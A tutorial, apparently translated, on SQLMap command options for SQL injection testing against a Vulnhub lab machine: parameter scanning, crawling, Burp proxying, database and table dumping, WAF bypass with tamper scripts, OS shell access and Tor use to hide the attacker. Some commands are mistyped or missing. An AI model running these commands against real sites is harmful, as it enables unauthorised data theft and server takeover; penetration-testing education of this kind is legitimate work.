Important SQLMap Commands
Introduction
The SQLMap tool can be found in every penetration tester's toolbox. It is one of the most popular and powerful tools when it comes to SQL injection vulnerability, which in turn tops the list of top 10 OWASP vulnerabilities. From verifying the existence of a vulnerability, to extracting the database name, tables, columns and full system capture, it can be used for many purposes.
In this article, we will see the different types of SQLMap commands that can come in handy when using different SQL injection scenarios. checkout our channel for article like this. Heree.
SQLMap can be downloaded with the following command:
git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
For demo purposes, I'm using this machine from Vulnhub.
Let's look at the basic use of the SQLMap tool for GET and POST requests.
GET request
sqlmap -u http://site-to-test.com/test.php?id=1 -p id
*: parameter for scanning (if the -p switch is not specified)
POST request
We can provide the data passed in the body of the POST request to be scanned by the SQLMap tool.
sqlmap -u http://site-to-test.com/admin/index.php --data="user=admin&password=admin" -p user
Another way is to copy the Burp query to a file and pass it to SQLMap.
sqlmap -r <path to request file>
Let's move forward a bit to understand the other options provided by the SQLMap tool.
Scanning login pages
Login pages are authorized by a cookie header, which is passed in the HTTP request header via GET/POST. In order to crawl the login page(s), we must supply a valid cookie value to SQLMap.
sqlmap -u http://192.168.202.163/admin/index.php?id=1 –-cookie="cookie value"
/admin/index.php?id=1 is the login page for publishing.
Likewise, many pages are protected by the User-Agent or Referrer header. They can also be included in the command:
sqlmap -u http://192.168.202.163/admin/index.php?id=1 --user-agent=infosec
Additionally, we can randomize the user-agent header using the --random-agent option.
crawling
Crawl is an important setting that allows the SQLMap tool to crawl a website starting from the root location. Traverse depth can be specified in the command.
sqlmap -u http://192.168.202.160/ –-crawl=1
--crawl : set the crawl depth (a value of 2 will allow the tool to crawl up to two directories).
If we want to exclude any page from the robot's search area, we can define it with --crawl-exclude. This is a useful option when we are scanning the login page.
sqlmap -u http://192.168.202.163/ –-crawl=3 –-cookie="cookie value" -–crawl-exclude="logout"
This command will crawl a website up to three directories and exclude any URL that contains the "logout" keyword.
As you can see below, SQLMap crawled the website but excluded the logout URL.
Let's run the same command without the --crawl-exclude option.
As seen below, when --crawl-exclude is not set, SQLMap crawled the logout URL. This will invalidate the existing session (due to logout) and not complete the scan.
SQLMap through proxy
We can set the details of the proxy for which we allow the request to pass. If we want to pass the request through a proxy tool like Burp, launch Burp Suite and configure it to run on localhost on port 8080. Now use the following command in SQLMap:
sqlmap -u http://192.168.202.162/cat.php?id=1 -p id -–proxy="http://localhost:8080"
Now think of a scenario where sql injection keywords such as OrderBy and Union are blacklisted on the server. We can bypass these types of implementations using the bypass technique . We will use SQLMap to send traffic to Burp and use Burp's "match and replace" feature to get around the above limitation.
The Match and Replace feature can be found in the Options tab under the Proxy tab in Burp.
Thus, if there is a keyword like "union" in the request, it will be replaced with "UnIoN".
In a scenario where the application is only accessible through an authorization proxy, you can set the proxy with the following command:
sqlmap -u http://192.168.202.162/cat.php?id=1 -p id –-proxy="http://localhost:8080" -–proxy-cred=username:password
Batch
Batch is used for non-interactive sessions. When we try to crawl something, SQLMap may ask us to enter data during the crawl: for example, when using the crawl function, the tool asks the user if the user wants to crawl the identified URL. If --batch is defined in the command, the tool uses the default to continue without prompting the user.
The form
The URL of a page with a form field (such as a login page) can be provided along with the --form option to parse the page and help the user validate the specified fields.
Pages with many form fields can now be efficiently tested using the --form and --batch options together. This will parse the page and check for the presence of form fields and automatically provide input on behalf of the user.
If you want to scan the entire application, you can use the scan option along with --form and --batch.
streams
The threads option allows the user to control the number of concurrent queries sent by the SQLMap tool. This will reduce the overall testing time. It should not be set too high, as this may affect the accuracy of the result.
Risk and Level
Risk accepts the payload type used by the tool. It defaults to 1 and can be configured up to level 3. Level 3, being the highest, includes some complex SQL queries.
Level defines the number of checks/payloads to perform. The range of values is from 1 to 5. The value 5 is the maximum and enables scanning of a large number of payloads.
Risk and Level are recommended to be increased if SQLMap can't detect injection in default settings.
verbose output
In case we want to see the payload being sent by the tool, we can use the verbose output option. The range of values is from 1 to 6.
database enumeration
Since we know that SQLMap is mainly used to exploit SQL Injection, let's look at some commands to enumerate databases through an application that is vulnerable to SQL Injection. Brought to you By Hackfreaks Official.
1. --dbs: This option is used to list databases.
2. Now we have a database name. To extract the table for the "photoblog" database, run the following command:
3. To retrieve column information from the "users" table, run the following command:
4. To dump the data for the "users" table, use the --dump command:
5. To identify the current database user:
sqlmap -u http://192.168.202.163/cat.php?id=2 --curent-user
6. To determine the current database name:
sqlmap -u http://192.168.202.163/cat.php?id=2 --current-db
7. To determine privileges, roles, and whether the current user is a DBA:
sqlmap -u http://192.168.202.163/cat.php?id=2 --privileges --roles --is-dba --hostname
Bypass WAF with Tamper Scripts
Often we encounter a scenario where an application is behind a Web Application Firewall (WAF). To check if a site is WAF protected, we can use the following parameter:
Once the WAF is identified, we can use the tamper script to attack WAF-protected applications. Tamper can modify the request to avoid WAF detection. The scripts can be found in the /usr/share/sqlmap/tamper/.
Running system commands
We can run OS/system level commands as long as the current database user has database administrator privileges. We can use the following options:
sqlmap -u http://192.168.202.162/cat.php?id=1 -–os-shell
sqlmap -u http://192.168.202.162/cat.php?id=1 –-os-cmd <cmd>
Executing SQL queries
We can run a SQL shell on the database by executing the following commands:
sqlmap -u 192.168.202.164/cat.php?id=2 --sql-shell
Other options
1. Scanning a page protected by HTTP authentication such as Basic, NTLM and Digest:
sqlmap -u http://example.com/admin.aspx -–auth-type Basic –-auth-cred «admin:admin»
2. Scanning a page protected by key-based authentication.
sqlmap -u http://example.com/admin.aspx --auth-file=<путь к сертификату PEM или файлу ключа>
3. To randomize attacking IP addresses (this can help prevent WAF detection, or to hide an attacker by making IP tracking more difficult).
sqlmap -u http://example.com/admin.aspx –tor
sqlmap -u http://example.com/admin.aspx –tor-port=<порт прокси-сервера tor>
4. If you need a delay between each HTTP request (in the example, a delay of 1 second):
sqlmap -u http://example.com/admin.aspx –delay=1
5. If the page is secured with a CSRF token, we can include it in the command:
sqlmap -u http://example.com/admin.aspx --csrf-token=<csrf token>
6. Second-Order SQL injection. In this type of SQL injection, the SQL payload is stored in the database and retrieved later when another page is accessed. We provide a URL that will be requested by the SQLMap tool after each injection. We can instruct the SQLMap tool to check for this injection using the following commands:
sqlmap -r /root/Desktop/Burp.txt –-second-order "http://target/vulnerbalepage.php"
The Burp.txt file contains the request to be injected.
--second-order contains the URL that SQLMap will access after each injection.
Conclusion
SQLMap is a good tool for discovering and exploiting SQL injection vulnerabilities. With so many options supported and the ability to create and use various customizations, it stands out from many other open source SQL injection testing tools.